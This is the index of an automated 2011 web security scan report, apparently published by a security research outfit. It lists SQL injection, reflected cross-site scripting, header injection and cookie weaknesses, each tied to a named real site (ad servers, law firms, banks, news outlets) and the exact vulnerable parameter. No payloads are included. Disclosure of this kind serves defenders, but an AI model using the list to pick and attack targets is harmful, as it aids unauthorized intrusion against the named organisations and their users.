XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05122011-02

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Thu May 12 08:15:19 CDT 2011.


Loading

1. SQL injection

1.1. http://da.newstogram.com/hg.php [DMUserTrack cookie]

1.2. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]

1.3. http://p.addthis.com/pixel [Referer HTTP header]

1.4. http://p.addthis.com/pixel [uid cookie]

1.5. http://www.pomerantzlaw.com/attorneys.html [attorneyID parameter]

1.6. http://www.pomerantzlaw.com/cases.html [CaseID parameter]

1.7. http://www.tuckerellis.com/ [name of an arbitrarily supplied request parameter]

1.8. http://www.tuckerellis.com/tucker-favicon.ico [REST URL parameter 1]

1.9. http://www.tuckerellis.com/tucker-favicon.ico [name of an arbitrarily supplied request parameter]

2. LDAP injection

3. HTTP header injection

3.1. http://ad.doubleclick.net/activity [REST URL parameter 1]

3.2. http://akatracking.esearchvision.com/esi/redirect2.html [esvaid parameter]

3.3. http://akatracking.esearchvision.com/esi/redirect2.html [esvcrea parameter]

3.4. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

3.5. http://amch.questionmarket.com/adscgen/sta.php [site parameter]

4. Cross-site scripting (reflected)

4.1. http://207.56.166.97/favicon.ico [REST URL parameter 1]

4.2. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 1]

4.3. http://207.56.166.97/javascript/c_smartmenus.js [REST URL parameter 2]

4.4. http://ad.amtk-media.com/iframe [@CPSC@ parameter]

4.5. http://ad.amtk-media.com/iframe [@CPSC@ parameter]

4.6. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]

4.7. http://ad.amtk-media.com/iframe [name of an arbitrarily supplied request parameter]

4.8. http://ad.amtk-media.com/iframe [target parameter]

4.9. http://ad.amtk-media.com/iframe [target parameter]

4.10. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]

4.11. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [ad parameter]

4.12. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]

4.13. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [camp parameter]

4.14. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter]

4.15. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [goto parameter]

4.16. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter]

4.17. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [name of an arbitrarily supplied request parameter]

4.18. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter]

4.19. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [opzn&page parameter]

4.20. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter]

4.21. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter]

4.22. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter]

4.23. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter]

4.24. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter]

4.25. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter]

4.26. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter]

4.27. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter]

4.28. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter]

4.29. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter]

4.30. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter]

4.31. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter]

4.32. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter]

4.33. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [ad parameter]

4.34. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter]

4.35. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [camp parameter]

4.36. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter]

4.37. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [goto parameter]

4.38. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter]

4.39. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [name of an arbitrarily supplied request parameter]

4.40. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter]

4.41. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [opzn&page parameter]

4.42. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter]

4.43. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [pos parameter]

4.44. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]

4.45. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn1 parameter]

4.46. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]

4.47. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sn2 parameter]

4.48. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]

4.49. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snr parameter]

4.50. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]

4.51. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [snx parameter]

4.52. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]

4.53. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.13 [sz parameter]

4.54. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]

4.55. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [ad parameter]

4.56. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]

4.57. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [camp parameter]

4.58. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]

4.59. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [goto parameter]

4.60. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]

4.61. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [name of an arbitrarily supplied request parameter]

4.62. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]

4.63. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [opzn&page parameter]

4.64. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]

4.65. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [pos parameter]

4.66. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]

4.67. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn1 parameter]

4.68. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]

4.69. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sn2 parameter]

4.70. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]

4.71. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snr parameter]

4.72. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]

4.73. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [snx parameter]

4.74. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]

4.75. http://ad.doubleclick.net/adj/N5364.nytimes/B5378238.14 [sz parameter]

4.76. http://ad.doubleclick.net/adj/fbn [name of an arbitrarily supplied request parameter]

4.77. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

4.78. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

4.79. http://admeld.adnxs.com/usersync [admeld_callback parameter]

4.80. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

4.81. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

4.82. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.83. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

4.84. http://ads1.revenue.net/j [r_num parameter]

4.85. http://ads1.revenue.net/j [site_id parameter]

4.86. http://adserving.cpxinteractive.com/st [ad_size parameter]

4.87. http://adserving.cpxinteractive.com/st [pop_frequency parameter]

4.88. http://adserving.cpxinteractive.com/st [pop_times parameter]

4.89. http://adserving.cpxinteractive.com/st [section parameter]

4.90. https://ams-legal.net/support/Login.asp [userid parameter]

4.91. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 3]

4.92. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/AppLoader/AENDU0IN29GG/5000//20110401-102631 [REST URL parameter 5]

4.93. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]

4.94. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/16420/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]

4.95. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 3]

4.96. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]

4.97. http://da.newstogram.com/hg.php [callback parameter]

4.98. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]

4.99. http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/ [REST URL parameter 2]

4.100. http://dealbook.nytimes.com/category/main-topics/private-equity/ [REST URL parameter 2]

4.101. http://dealbook.nytimes.com/category/main-topics/venture-capital/ [REST URL parameter 2]

4.102. http://ds.addthis.com/red/psi/sites/www.csscorp.com/p.json [callback parameter]

4.103. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter]

4.104. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter]

4.105. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]

4.106. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]

4.107. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpjs parameter]

4.108. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]

4.109. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpvc parameter]

4.110. http://js.revsci.net/gateway/gw.js [csid parameter]

4.111. http://kona40.kontera.com/KonaGet.js [l parameter]

4.112. http://kona40.kontera.com/KonaGet.js [rId parameter]

4.113. http://lfov.net/webrecorder/g/chimera.js [vid parameter]

4.114. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

4.115. http://r.turn.com/server/pixel.htm [fpid parameter]

4.116. http://r.turn.com/server/pixel.htm [sp parameter]

4.117. http://video.foxbusiness.com/v/feed/video/4674822.js [callback parameter]

4.118. http://wd.sharethis.com/api/getCount2.php [cb parameter]

4.119. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]

4.120. http://wd.sharethis.com/api/getCount2.php [url parameter]

4.121. http://webezines.kwithost.com/sx25Feed.php [callback parameter]

4.122. http://wolfgreenfield.com/favicon.ico [REST URL parameter 1]

4.123. http://wolfgreenfield.com/v_arrow.gif [REST URL parameter 1]

4.124. http://wolfgreenfield.com/v_arrow.gif [name of an arbitrarily supplied request parameter]

4.125. http://www.bloomberg.com/apps/data [sgid parameter]

4.126. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 3]

4.127. http://www.butlerrubin.com/web/br.nsf/80868dabe98107a18525708000086fe1/$NavImagemap/0.52 [REST URL parameter 5]

4.128. http://www.butlerrubin.com/web/br.nsf/index [REST URL parameter 3]

4.129. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 3]

4.130. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 4]

4.131. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 5]

4.132. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 3]

4.133. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 4]

4.134. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 5]

4.135. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 3]

4.136. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 4]

4.137. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 5]

4.138. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 3]

4.139. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 4]

4.140. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 5]

4.141. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 3]

4.142. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 4]

4.143. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 5]

4.144. http://www.hbsr.com/contact_us/index [REST URL parameter 1]

4.145. http://www.hbsr.com/contact_us/index [REST URL parameter 2]

4.146. http://www.hbsr.com/contact_us/index [name of an arbitrarily supplied request parameter]

4.147. http://www.hbsr.com/favicon.ico [REST URL parameter 1]

4.148. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 1]

4.149. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [REST URL parameter 2]

4.150. http://www.hbsr.com/news_events/133-congratulations-finalists-invented-here-celebration-new-england [name of an arbitrarily supplied request parameter]

4.151. http://www.hbsr.com/news_events/index [REST URL parameter 1]

4.152. http://www.hbsr.com/news_events/index [REST URL parameter 2]

4.153. http://www.hbsr.com/news_events/index [name of an arbitrarily supplied request parameter]

4.154. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 1]

4.155. http://www.hbsr.com/practices_technologies/biotechnology [REST URL parameter 2]

4.156. http://www.hbsr.com/practices_technologies/biotechnology [name of an arbitrarily supplied request parameter]

4.157. http://www.hbsr.com/practices_technologies/index [REST URL parameter 1]

4.158. http://www.hbsr.com/practices_technologies/index [REST URL parameter 2]

4.159. http://www.hbsr.com/practices_technologies/index [name of an arbitrarily supplied request parameter]

4.160. http://www.hbsr.com/practices_technologies/software [REST URL parameter 1]

4.161. http://www.hbsr.com/practices_technologies/software [REST URL parameter 2]

4.162. http://www.hbsr.com/practices_technologies/software [name of an arbitrarily supplied request parameter]

4.163. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 1]

4.164. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 2]

4.165. http://www.hbsr.com/practices_technologies/telecommunications [name of an arbitrarily supplied request parameter]

4.166. http://www.pillsburylaw.com/connect_forgotpassword.cfm [name of an arbitrarily supplied request parameter]

4.167. http://www.pillsburylaw.com/connect_forgotpassword.cfm [p parameter]

4.168. http://www.pillsburylaw.com/index.cfm [name of an arbitrarily supplied request parameter]

4.169. http://www.stroock.com/sitecontent.cfm [contentID parameter]

4.170. http://www.wolfgreenfield.com/favicon.ico [REST URL parameter 1]

4.171. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 1]

4.172. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 2]

4.173. http://www.wolfgreenfield.com/industries_technologies/index [name of an arbitrarily supplied request parameter]

4.174. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 1]

4.175. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 2]

4.176. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [name of an arbitrarily supplied request parameter]

4.177. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 1]

4.178. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 2]

4.179. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 1]

4.180. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 2]

4.181. http://www.wolfgreenfield.com/practices_services/internet-domain-names [name of an arbitrarily supplied request parameter]

4.182. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 1]

4.183. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 2]

4.184. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [name of an arbitrarily supplied request parameter]

4.185. http://adserving.cpxinteractive.com/st [Referer HTTP header]

4.186. http://da.newstogram.com/hg.php [DMUserTrack cookie]

4.187. http://seg.sharethis.com/getSegment.php [__stid cookie]

4.188. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]

4.189. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros [meld_sess cookie]

4.190. http://trc.taboolasyndication.com/bloomberg/trc/2/json [taboola_user_id cookie]

4.191. http://www.pillsburylaw.com/index.cfm [PCUSERNAME cookie]

5. Flash cross-domain policy

5.1. http://ad.doubleclick.net/crossdomain.xml

5.2. http://ad.us.doubleclick.net/crossdomain.xml

5.3. http://apps.shareholder.com/crossdomain.xml

5.4. http://b.scorecardresearch.com/crossdomain.xml

5.5. http://bs.serving-sys.com/crossdomain.xml

5.6. http://by.optimost.com/crossdomain.xml

5.7. http://ds.serving-sys.com/crossdomain.xml

5.8. http://engine.cmmeglobal.com/crossdomain.xml

5.9. http://feeds.feedburner.com/crossdomain.xml

5.10. http://js.revsci.net/crossdomain.xml

5.11. http://pix04.revsci.net/crossdomain.xml

5.12. http://secure-us.imrworldwide.com/crossdomain.xml

5.13. http://wt.o.nytimes.com/crossdomain.xml

5.14. http://add.my.yahoo.com/crossdomain.xml

5.15. http://dealbook.nytimes.com/crossdomain.xml

5.16. http://googleads.g.doubleclick.net/crossdomain.xml

5.17. http://graphics8.nytimes.com/crossdomain.xml

5.18. http://markets.on.nytimes.com/crossdomain.xml

5.19. http://media.ft.com/crossdomain.xml

5.20. http://pagead2.googlesyndication.com/crossdomain.xml

5.21. http://pubads.g.doubleclick.net/crossdomain.xml

5.22. http://timespeople.nytimes.com/crossdomain.xml

5.23. http://www.facebook.com/crossdomain.xml

5.24. http://www.ft.com/crossdomain.xml

5.25. http://www.nytimes.com/crossdomain.xml

5.26. http://pillsburylaw.app4.hubspot.com/crossdomain.xml

5.27. http://stats.ft.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad.us.doubleclick.net/clientaccesspolicy.xml

6.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

6.4. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://secniche.org:2082/tmp/secniche/webalizer//usage_201105.html

7.2. http://www.digiware.net/

7.3. http://www.huroncapital.com/secure/

7.4. http://www.pillsburylaw.com/

7.5. http://www.pillsburylaw.com/index.cfm

7.6. http://www.privateequityinfo.com/

7.7. http://www.privateequityinfo.com/forgotpassword.php

7.8. http://www.privateequityinfo.com/product_details.php

7.9. http://www.soundpatheview.com/

8. SSL cookie without secure flag set

8.1. https://ams-legal.net/support/default.asp

8.2. https://ams-legal.net/tuckerellis/Image.asp

8.3. https://ams-legal.net/tuckerellis/Login.asp

8.4. https://ams-legal.net/tuckerellis/default.asp

8.5. https://ams-legal.net/tuckerellis/default.asp

8.6. https://cle-files.tuckerellis.com/

8.7. https://cle-files.tuckerellis.com/password_reset

8.8. https://cle-files.tuckerellis.com/register

8.9. https://secure.reportingsystem.com/TPG/index.cfm

8.10. https://services.sungarddx.com/Default.aspx

8.11. https://services.sungarddx.com/common/js/AdminFunctions.asp

8.12. https://services.sungarddx.com/js/source.asp

8.13. https://webmail.tuckerellis.com/exchweb/bin/auth/owaauth.dll

8.14. https://ww3.janus.com/advisor/about-janus

8.15. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

8.16. https://personal.vanguard.com/us/funds/snapshot

8.17. https://services.sungarddx.com/default.aspx

8.18. https://virtualoffice.tuckerellis.com/

8.19. https://ww3.janus.com/favicon.ico

8.20. https://www.wellsfargo.com/jump/theprivatebank/index

9. Session token in URL

9.1. http://by.optimost.com/counter/553/-/129/event.js

9.2. http://l.sharethis.com/pview

9.3. http://www.facebook.com/extern/login_status.php

10. Password field submitted using GET method

10.1. https://secure.reportingsystem.com/TPG/index.cfm

10.2. https://secure.reportingsystem.com/carlyle/

10.3. http://www.soundpatheview.com/

11. ASP.NET ViewState without MAC enabled

12. Open redirection

13. Cookie scoped to parent domain

13.1. http://convctr.overture.com/images/cc/cc.gif

13.2. http://foxbusiness.disqus.com/thread.js

13.3. https://personal.vanguard.com/us/funds/snapshot

13.4. http://www.dmoc.com/

13.5. http://www.elawmarketing.com/

13.6. http://www.korteco.com/

13.7. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

13.8. http://ad.amtk-media.com/iframe

13.9. http://ad.doubleclick.net/clk

13.10. http://ad.turn.com/server/ads.js

13.11. http://admeld.adnxs.com/usersync

13.12. http://ads.adbrite.com/adserver/vdi/742697

13.13. http://ads.revsci.net/adserver/ako

13.14. http://ads.revsci.net/adserver/ako

13.15. http://ads.revsci.net/adserver/ako

13.16. http://ads.revsci.net/adserver/ako

13.17. http://ads.revsci.net/adserver/ako

13.18. http://ads.revsci.net/adserver/ako

13.19. http://ads.revsci.net/adserver/ako

13.20. http://ads1.revenue.net/j

13.21. http://ads1.revenue.net/load/227245/index.html

13.22. http://akatracking.esearchvision.com/esi/redirect.html

13.23. http://akatracking.esearchvision.com/esi/redirect2.html

13.24. http://altfarm.mediaplex.com/ad/js/15917-119013-26745-9

13.25. http://amch.questionmarket.com/adsc/d908257/6/911744/decide.php

13.26. http://amch.questionmarket.com/adsc/d909615/2/200214693344/decide.php

13.27. http://amch.questionmarket.com/adsc/d909615/2/200214693345/decide.php

13.28. http://amch.questionmarket.com/adsc/d909615/2/200214693346/decide.php

13.29. http://amch.questionmarket.com/adsc/d909615/2/912024/decide.php

13.30. http://amch.questionmarket.com/adsc/d909615/2/912025/decide.php

13.31. http://amch.questionmarket.com/adsc/d909615/2/912026/decide.php

13.32. http://amch.questionmarket.com/adsc/d909615/2/912027/decide.php

13.33. http://b.scorecardresearch.com/b

13.34. http://bs.serving-sys.com/BurstingPipe/adServer.bs

13.35. http://cf.addthis.com/red/p.json

13.36. http://core.insightexpressai.com/adServer/adServerESI.aspx

13.37. http://cspix.media6degrees.com/orbserv/hbpix

13.38. http://da.newstogram.com/hg.php

13.39. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json

13.40. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json

13.41. http://ib.adnxs.com/ptj

13.42. http://id.google.com/verify/EAAAAMuM38IiZaQMTv0qVSa50bs.gif

13.43. http://id.google.com/verify/EAAAAMvcQqr1NPgfDRpmfjdPxdo.gif

13.44. http://id.google.com/verify/EAAAAOW1EPjB-6m1cfgoaUZgYek.gif

13.45. http://id.google.com/verify/EAAAAPk-aVA72N8UD0L0g156sYY.gif

13.46. http://idpix.media6degrees.com/orbserv/hbpix

13.47. http://js.revsci.net/gateway/gw.js

13.48. http://m1463.ic-live.com/572/

13.49. http://marketing.csscorp.com/acton/bn/1090/visitor.gif

13.50. http://meter-svc.nytimes.com/meter.js

13.51. http://metrics.foxnews.com/b/ss/foxnewsbusinessprod/1/H.20.3/s19025191229302

13.52. http://odb.outbrain.com/utils/get

13.53. http://odb.outbrain.com/utils/ping.html

13.54. http://overseebroad.d.chango.com/c/t.js

13.55. http://pix04.revsci.net/D08734/a1/0/0/0.gif

13.56. http://pix04.revsci.net/E05510/b3/0/3/1003161/38529734.js

13.57. http://pix04.revsci.net/H07707/b3/0/3/0806180/203086575.js

13.58. http://pix04.revsci.net/H07707/b3/0/3/0806180/215595401.js

13.59. http://pix04.revsci.net/H07707/b3/0/3/0806180/225588936.js

13.60. http://pix04.revsci.net/H07707/b3/0/3/0806180/273184684.js

13.61. http://pix04.revsci.net/H07707/b3/0/3/0806180/293330189.js

13.62. http://pix04.revsci.net/H07707/b3/0/3/0806180/396037982.js

13.63. http://pix04.revsci.net/H07707/b3/0/3/0806180/513736918.js

13.64. http://pix04.revsci.net/H07707/b3/0/3/0806180/551354059.js

13.65. http://pix04.revsci.net/H07707/b3/0/3/0806180/562084143.js

13.66. http://pix04.revsci.net/H07707/b3/0/3/0806180/579814010.js

13.67. http://pix04.revsci.net/H07707/b3/0/3/0806180/590965522.js

13.68. http://pix04.revsci.net/H07707/b3/0/3/0806180/702365539.js

13.69. http://pix04.revsci.net/H07707/b3/0/3/0806180/71896167.js

13.70. http://pix04.revsci.net/H07707/b3/0/3/0806180/747456476.js

13.71. http://pix04.revsci.net/H07707/b3/0/3/0806180/848419951.js

13.72. http://pix04.revsci.net/H07707/b3/0/3/0806180/912026619.js

13.73. http://pix04.revsci.net/H07707/b3/0/3/0806180/949356899.js

13.74. http://pix04.revsci.net/H07707/b3/0/3/0806180/955065746.js

13.75. http://pix04.revsci.net/J07717/b3/0/3/1003161/451564742.js

13.76. http://pix04.revsci.net/K05539/b3/0/3/1003161/248479722.js

13.77. http://pixel.33across.com/ps/

13.78. http://pixel.quantserve.com/pixel

13.79. http://r.turn.com/r/bd

13.80. http://r.turn.com/r/beacon

13.81. http://r.turn.com/server/pixel.htm

13.82. http://segments.adap.tv/data/

13.83. http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543457%22%20height=%221%22%20width=%221%22

13.84. http://tags.bluekai.com/site/668

13.85. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html

13.86. http://track.ft.com/track/track.js

13.87. http://va.px.invitemedia.com/pixel

13.88. http://www.csscorp.com/

13.89. http://www.nytimes.com/adx/bin/adx_remote.html

13.90. https://www.wellsfargo.com/jump/theprivatebank/index

14. Cookie without HttpOnly flag set

14.1. https://ams-legal.net/support/default.asp

14.2. https://ams-legal.net/tuckerellis/Image.asp

14.3. https://ams-legal.net/tuckerellis/Login.asp

14.4. https://ams-legal.net/tuckerellis/default.asp

14.5. https://ams-legal.net/tuckerellis/default.asp

14.6. http://axley.com/

14.7. http://cgiwsc.enhancedsitebuilder.com/cgi-bin/counter.PicCount

14.8. http://cgiwsc.enhancedsitebuilder.com/extras/public/formular.cls/show

14.9. http://convctr.overture.com/images/cc/cc.gif

14.10. http://cpadominator.com/campaigns/index.php

14.11. http://foxbusiness.disqus.com/thread.js

14.12. http://generalatlantic.com/en/team/overview

14.13. http://m1463.ic-live.com/572/

14.14. https://personal.vanguard.com/us/funds/snapshot

14.15. http://privatemoneytalk.com/

14.16. http://revelations.trovus.co.uk/tracker/542.gif

14.17. https://secure.reportingsystem.com/TPG/index.cfm

14.18. https://services.sungarddx.com/common/js/AdminFunctions.asp

14.19. https://services.sungarddx.com/js/source.asp

14.20. http://trc.taboolasyndication.com/bloomberg/trc/2/json

14.21. https://webmail-us.mimecast.com/webMail/login.jsp

14.22. https://webmail.tuckerellis.com/exchweb/bin/auth/owaauth.dll

14.23. https://ww3.janus.com/advisor/about-janus

14.24. http://www.ams-legal.com/

14.25. http://www.apolloic.com/

14.26. http://www.conferenceservers.com/browser/proxy.asp

14.27. http://www.dmoc.com/

14.28. http://www.elawmarketing.com/

14.29. http://www.huroncapital.com/secure/

14.30. http://www.kkr.com/company/landmark_achievements.cfm

14.31. http://www.kkr.com/investor/investor_relations_overview.cfm

14.32. http://www.kkr.com/kpe/private_equity_overview.cfm

14.33. http://www.kkr.com/team/theteam.cfm

14.34. http://www.korteco.com/

14.35. http://www.milbank.com/en

14.36. http://www.pillsburylaw.com/

14.37. http://www.pillsburylaw.com/connect_forgotpassword.cfm

14.38. http://www.pillsburylaw.com/index.cfm

14.39. http://www.pillsburylaw.com/scripts/images/arrows-default.png

14.40. http://www.pomerantzlaw.com/cases.html

14.41. http://www.privateequityinfo.com/

14.42. http://www.privatemoneytalk.com/

14.43. http://www.provequity.com/

14.44. http://www.providenceequitypartners.com/

14.45. http://www.stroock.com/

14.46. https://www.usaa.com/inet/imco_mutualfund/ImMutualFunds

14.47. http://ad.amtk-media.com/iframe

14.48. http://ad.doubleclick.net/clk

14.49. http://ad.turn.com/server/ads.js

